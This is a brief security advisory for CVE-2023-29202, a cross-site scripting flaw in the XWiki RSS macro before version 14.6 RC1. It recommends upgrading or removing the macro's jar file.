CVE-2023-29202

Name of the Vulnerable Software and Affected Versions XWiki versions prior to 14.6 RC1

Description The RSS macro in XWiki included the content of feed items without proper cleaning in the HTML output when the parameter content was set to true, allowing arbitrary HTML and JavaScript injection, and thus cross-site scripting (XSS) by specifying an RSS feed with malicious content. This could be used to execute arbitrary actions in the wiki, including privilege escalation, remote code execution, information disclosure, modifying or deleting content, and sabotaging the wiki, with the interaction of a user with programming rights.

Recommendations For versions prior to 14.6 RC1, update to XWiki 14.6 RC1, where the content of the feed is now properly cleaned before being displayed. As a workaround, if the RSS macro isn't used in the wiki, consider uninstalling the macro by deleting WEB-INF/lib/xwiki-platform-rendering-macro-rss-XX.jar, where XX is XWiki's version, in the web application's directory.